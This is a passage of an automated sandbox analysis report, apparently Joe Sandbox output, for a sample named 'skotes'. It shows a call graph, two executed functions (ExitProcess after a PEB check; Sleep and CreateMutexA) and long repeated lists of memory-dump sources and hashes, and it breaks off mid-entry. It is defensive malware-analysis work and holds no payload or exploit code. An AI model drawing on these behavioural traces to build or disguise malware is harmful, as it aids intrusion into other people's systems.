calls 10150->10151 10153 96757 shared_ptr 10151->10153 10152 95c10 3 API calls 10152->10153 10153->10152 10154 96852 shared_ptr std::invalid_argument::invalid_argument 10153->10154 10155 922c0 3 API calls 10153->10155 10155->10153 9650 c6629 9653 c64c7 9650->9653 9654 c64d5 __cftof 9653->9654 9655 c6520 9654->9655 9658 c652b 9654->9658 9657 c652a 9664 ca302 GetPEB 9658->9664 9660 c6535 9661 c654a __cftof 9660->9661 9662 c653a GetPEB 9660->9662 9663 c6562 ExitProcess 9661->9663 9662->9661 9665 ca31c __cftof 9664->9665 9665->9660 10156 920a0 10157 ac68b __Mtx_init_in_situ 2 API calls 10156->10157 10158 920ac 10157->10158 10273 94120 10274 9416a 10273->10274 10276 941b2 std::invalid_argument::invalid_argument 10274->10276 10277 93ee0 10274->10277 10278 93f48 10277->10278 10279 93f1e 10277->10279 10280 93f58 10278->10280 10283 92c00 10278->10283 10279->10276 10280->10276 10284 92c0e 10283->10284 10290 ab847 10284->10290 10286 92c42 10287 92c49 10286->10287 10296 92c80 10286->10296 10287->10276 10289 92c58 std::_Throw_future_error 10291 ab854 10290->10291 10295 ab873 Concurrency::details::_Reschedule_chore 10290->10295 10299 acb77 10291->10299 10293 ab864 10293->10295 10301 ab81e 10293->10301 10295->10286 10307 ab7fb 10296->10307 10298 92cb2 shared_ptr 10298->10289 10300 acb92 CreateThreadpoolWork 10299->10300 10300->10293 10302 ab827 Concurrency::details::_Reschedule_chore 10301->10302 10305 acdcc 10302->10305 10304 ab841 10304->10295 10306 acde1 TpPostWork 10305->10306 10306->10304 10308 ab817 10307->10308 10309 ab807 10307->10309 10308->10298 10309->10308 10311 aca78 10309->10311 10312 aca8d TpReleaseWork 10311->10312 10312->10308 10407 93fe0 10408 94022 10407->10408 10409 9408c 10408->10409 10410 940d2 10408->10410 10413 94035 std::invalid_argument::invalid_argument 10408->10413 10414 935e0 10409->10414 10411 93ee0 3 API calls 10410->10411 10411->10413 10415 93616 10414->10415 10419 9364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10415->10419 10420 92ce0 10415->10420 10417 9369e 10418 92c00 3 API calls 10417->10418 10417->10419 10418->10419 10419->10413 10421 92d1d 10420->10421 10422 abedf InitOnceExecuteOnce 10421->10422 10424 92d46 10422->10424 10423 92d88 10427 92440 3 API calls 10423->10427 10424->10423 10425 92d51 std::invalid_argument::invalid_argument 10424->10425 10429 abef7 10424->10429 10425->10417 10428 92d9b 10427->10428 10428->10417 10430 abf03 std::_Throw_future_error 10429->10430 10431 abf6a 10430->10431 10432 abf73 10430->10432 10436 abe7f 10431->10436 10434 92ae0 4 API calls 10432->10434 10435 abf6f 10434->10435 10435->10423 10437 acc31 InitOnceExecuteOnce 10436->10437 10439 abe97 10437->10439 10438 abe9e 10438->10435 10439->10438 10440 c6cbb 3 API calls 10439->10440 10441 abea7 10440->10441 10441->10435 10398 99ba5 10399 99ba7 10398->10399 10400 95c10 3 API calls 10399->10400 10401 99cb1 10400->10401 10402 98b30 3 API calls 10401->10402 10403 99cc2 10402->10403 9890 9cc79 9891 9cc84 shared_ptr 9890->9891 9892 9ccda shared_ptr std::invalid_argument::invalid_argument 9891->9892 9896 95c10 9891->9896 9894 9ce9d 9914 9ca70 9894->9914 9897 95c54 9896->9897 9924 94b30 9897->9924 9899 95d17 shared_ptr std::invalid_argument::invalid_argument 9899->9894 9900 95c7b __cftof 9900->9899 9901 95c10 3 API calls 9900->9901 9902 966ac 9901->9902 9903 95c10 3 API calls 9902->9903 9904 966b1 9903->9904 9928 922c0 9904->9928 9906 966c9 shared_ptr 9907 95c10 3 API calls 9906->9907 9908 9673d 9907->9908 9909 922c0 3 API calls 9908->9909 9911 96757 shared_ptr 9909->9911 9910 95c10 3 API calls 9910->9911 9911->9910 9912 96852 shared_ptr std::invalid_argument::invalid_argument 9911->9912 9913 922c0 3 API calls 9911->9913 9912->9894 9913->9911 9917 9cadd 9914->9917 9915 9cc87 9916 9ccda shared_ptr std::invalid_argument::invalid_argument 9915->9916 9921 95c10 3 API calls 9915->9921 9917->9915 9918 95c10 3 API calls 9917->9918 9919 9ccf9 9918->9919 10073 99030 9919->10073 9922 9ce9d 9921->9922 9923 9ca70 3 API calls 9922->9923 9926 94ce5 9924->9926 9927 94b92 9924->9927 9926->9900 9927->9926 9931 c6da6 9927->9931 9957 92280 9928->9957 9932 c6db4 9931->9932 9933 c6dc2 9931->9933 9936 c6d19 9932->9936 9933->9927 9937 c690a __cftof 3 API calls 9936->9937 9938 c6d2c 9937->9938 9941 c6d52 9938->9941 9940 c6d3d 9940->9927 9942 c6d8f 9941->9942 9943 c6d5f 9941->9943 9952 cb67d 9942->9952 9946 c6d6e 9943->9946 9947 cb6a1 9943->9947 9946->9940 9948 c690a __cftof 3 API calls 9947->9948 9950 cb6be 9948->9950 9949 cb6ce std::invalid_argument::invalid_argument 9949->9946 9950->9949 9951 cf1bf __cftof 3 API calls 9950->9951 9951->9949 9953 ca671 __cftof 3 API calls 9952->9953 9954 cb688 9953->9954 9955 cb5fb __cftof 3 API calls 9954->9955 9956 cb698 9955->9956 9956->9946 9958 92296 9957->9958 9961 c87f8 9958->9961 9964 c7609 9961->9964 9963 922a4 9963->9906 9965 c7649 9964->9965 9969 c7631 __dosmaperr ___std_exception_copy std::invalid_argument::invalid_argument 9964->9969 9966 c690a __cftof 3 API calls 9965->9966 9965->9969 9967 c7661 9966->9967 9970 c7bc4 9967->9970 9969->9963 9971 c7bd5 9970->9971 9972 c7be4 __dosmaperr ___std_exception_copy 9971->9972 9977 c8168 9971->9977 9982 c7dc2 9971->9982 9987 c7de8 9971->9987 9997 c7f36 9971->9997 9972->9969 9978 c8178 9977->9978 9979 c8171 9977->9979 9978->9971 10006 c7b50 9979->10006 9981 c8177 9981->9971 9983 c7dcb 9982->9983 9984 c7dd2 9982->9984 9985 c7b50 3 API calls 9983->9985 9984->9971 9986 c7dd1 9985->9986 9986->9971 9988 c7e09 __dosmaperr ___std_exception_copy 9987->9988 9991 c7def 9987->9991 9988->9971 9989 c7f69 9995 c7f77 9989->9995 9996 c7f8b 9989->9996 10024 c8241 9989->10024 9990 c7fa2 9990->9996 10020 c8390 9990->10020 9991->9988 9991->9989 9991->9990 9991->9995 9995->9996 10028 c86ea 9995->10028 9996->9971 9998 c7f4f 9997->9998 9999 c7f69 9997->9999 9998->9999 10000 c7fa2 9998->10000 10004 c7f77 9998->10004 10001 c8241 3 API calls 9999->10001 9999->10004 10005 c7f8b 9999->10005 10002 c8390 3 API calls 10000->10002 10000->10005 10001->10004 10002->10004 10003 c86ea 3 API calls 10003->10005 10004->10003 10004->10005 10005->9971 10007 c7b62 __dosmaperr 10006->10007 10010 c8ab6 10007->10010 10009 c7b85 __dosmaperr 10009->9981 10011 c8ad1 10010->10011 10014 c8868 10011->10014 10013 c8adb 10013->10009 10015 c887a 10014->10015 10016 c690a __cftof GetPEB ExitProcess GetPEB 10015->10016 10019 c888f __dosmaperr ___std_exception_copy 10015->10019 10018 c88bf 10016->10018 10017 c6d52 GetPEB ExitProcess GetPEB 10017->10018 10018->10017 10018->10019 10019->10013 10022 c83ab 10020->10022 10021 c83dd 10021->9995 10022->10021 10032 cc88e 10022->10032 10025 c825a 10024->10025 10039 cd3c8 10025->10039 10027 c830d 10027->9995 10027->10027 10030 c875d std::invalid_argument::invalid_argument 10028->10030 10031 c8707 10028->10031 10029 cc88e __cftof 3 API calls 10029->10031 10030->9996 10031->10029 10031->10030 10035 cc733 10032->10035 10034 cc8a6 10034->10021 10036 cc743 10035->10036 10037 c690a __cftof GetPEB ExitProcess GetPEB 10036->10037 10038 cc748 __cftof __dosmaperr ___std_exception_copy 10036->10038 10037->10038 10038->10034 10040 cd3d8 __dosmaperr ___std_exception_copy 10039->10040 10043 cd3ee 10039->10043 10040->10027 10041 cd485 10045 cd4ae 10041->10045 10046 cd4e4 10041->10046 10042 cd48a 10052 ccbdf 10042->10052 10043->10040 10043->10041 10043->10042 10048 cd4cc 10045->10048 10049 cd4b3 10045->10049 10069 ccef8 10046->10069 10065 cd0e2 10048->10065 10058 cd23e 10049->10058 10053 ccbf1 10052->10053 10054 c690a __cftof GetPEB ExitProcess GetPEB 10053->10054 10055 ccc05 10054->10055 10056 ccef8 GetPEB ExitProcess GetPEB 10055->10056 10057 ccc0d __alldvrm __cftof __dosmaperr ___std_exception_copy _strrchr 10055->10057 10056->10057 10057->10040 10061 cd26c 10058->10061 10059 cd2a5 10059->10040 10060 cd2de 10062 ccf9a GetPEB ExitProcess GetPEB 10060->10062 10061->10059 10061->10060 10063 cd2b7 10061->10063 10062->10059 10064 cd16d GetPEB ExitProcess GetPEB 10063->10064 10064->10059 10067 cd10f 10065->10067 10066 cd14e 10066->10040 10067->10066 10068 cd16d GetPEB ExitProcess GetPEB 10067->10068 10068->10066 10070 ccf10 10069->10070 10071 ccf75 10070->10071 10072 ccf9a GetPEB ExitProcess GetPEB 10070->10072 10071->10040 10072->10071 10074 99080 10073->10074 10075 95c10 3 API calls 10074->10075 10076 9909a shared_ptr std::invalid_argument::invalid_argument 10075->10076 10076->9915 10159 99ab8 10161 99acc 10159->10161 10162 99b08 10161->10162 10163 95c10 3 API calls 10162->10163 10164 99b7c 10163->10164 10171 98b30 10164->10171 10166 99b8d 10167 95c10 3 API calls 10166->10167 10168 99cb1 10167->10168 10169 98b30 3 API calls 10168->10169 10170 99cc2 10169->10170 10172 98b7c 10171->10172 10173 95c10 3 API calls 10172->10173 10174 98b97 shared_ptr 10173->10174 10175 98d01 shared_ptr std::invalid_argument::invalid_argument 10174->10175 10176 95c10 3 API calls 10174->10176 10175->10166 10178 98d9a shared_ptr 10176->10178 10177 98e7e shared_ptr std::invalid_argument::invalid_argument 10177->10166 10178->10177 10179 95c10 3 API calls 10178->10179 10180 98f1a shared_ptr std::invalid_argument::invalid_argument 10179->10180 10180->10166 10404 c8bbe 10405 c8868 3 API calls 10404->10405 10406 c8bdc 10405->10406 10181 942b0 10184 93ac0 10181->10184 10183 942bb shared_ptr 10185 93af9 10184->10185 10187 932d0 5 API calls 10185->10187 10188 93b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10185->10188 10189 93c38 10185->10189 10186 932d0 5 API calls 10191 93c5f 10186->10191 10187->10189 10188->10183 10189->10186 10189->10191 10190 93c68 10190->10183 10191->10190 10192 93810 3 API calls 10191->10192 10193 93cdb shared_ptr 10192->10193 10193->10183 10357 93970 10358 ac68b __Mtx_init_in_situ 2 API calls 10357->10358 10359 939a7 10358->10359 10360 ac68b __Mtx_init_in_situ 2 API calls 10359->10360 10361 939e6 10360->10361 10362 92170 10363 ac6fc InitializeCriticalSectionEx 10362->10363 10364 9217a 10363->10364 10442 955f0 10443 95610 10442->10443 10443->10443 10444 922c0 3 API calls 10443->10444 10445 95710 std::invalid_argument::invalid_argument 10443->10445 10444->10443 10446 943f0 10447 abedf InitOnceExecuteOnce 10446->10447 10448 9440a 10447->10448 10449 94411 10448->10449 10450 c6cbb 3 API calls 10448->10450 10451 94424 10450->10451 10256 a9ef0 10257 a9f0c 10256->10257 10258 ac68b __Mtx_init_in_situ 2 API calls 10257->10258 10259 a9f17 10258->10259 10077 94276 10080 92410 10077->10080 10079 9427f 10081 92424 10080->10081 10084 ab52d 10081->10084 10092 c3aed 10084->10092 10086 9242a 10086->10079 10087 ab5a5 ___std_exception_copy 10099 ab1ad 10087->10099 10088 ab598 10095 aaf56 10088->10095 10103 c4f29 10092->10103 10096 aaf9f ___std_exception_copy 10095->10096 10098 aafb2 shared_ptr 10096->10098 10110 ab39f 10096->10110 10098->10086 10100 ab1d8 10099->10100 10102 ab1e1 shared_ptr 10099->10102 10101 ab39f 4 API calls 10100->10101 10101->10102 10102->10086 10105 c4f2e __cftof 10103->10105 10104 ab555 10104->10086 10104->10087 10104->10088 10105->10104 10106 cd634 __cftof 3 API calls 10105->10106 10109 c8bfc __cftof 10105->10109 10106->10109 10107 c65ed __cftof 3 API calls 10108 c8c2f 10107->10108 10109->10107 10111 abedf InitOnceExecuteOnce 10110->10111 10112 ab3e1 10111->10112 10113 ab3e8 10112->10113 10121 c6cbb 10112->10121 10113->10098 10122 c6cc7 __dosmaperr 10121->10122 10123 ca671 __cftof 3 API calls 10122->10123 10124 c6ccc 10123->10124 10125 c8bec __cftof 3 API calls 10124->10125 10126 c6cf6 10125->10126

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 000C652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 342 c652b-c6538 call ca302 345 c655a-c656c call c656d ExitProcess 342->345 346 c653a-c6548 GetPEB 342->346 346->345 347 c654a-c6559 346->347 347->345
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,000C652A,?,?,?,?,?,000C7661), ref: 000C6567
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                  • Opcode ID: 69560835b249271f8772c92c6ecff1ec2257145e28472c58be71742c5ba5abeb
                                                                                                                                                                                                                                                  • Instruction ID: 37f975381d86764ba36f156a7216871663328d5d97d2278a95ef363b1910a533
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69560835b249271f8772c92c6ecff1ec2257145e28472c58be71742c5ba5abeb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3E08C30140548AECF357B18CD19E8D3BA9EB62749F201D08F91986223CB26EE81C691
                                                                                                                                                                                                                                                  Function 00099BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 0 99ba5-99d91 call a7a00 call 95c10 call 98b30 call a8220
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: a9d81d7ca823fee35c569bfea360eaca4bd7abffa844763c53681ada1014ef4b
                                                                                                                                                                                                                                                  • Instruction ID: 9daf3b58d6dc9e363278e6b6baf966bcfb37bc54c6989d78be2b7a7e16a90497
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9d81d7ca823fee35c569bfea360eaca4bd7abffa844763c53681ada1014ef4b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B43118717042048BEF189BBCDD89BADB7A2AB82310F24861DE014D76D6C779D9809752
                                                                                                                                                                                                                                                  Function 00099F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
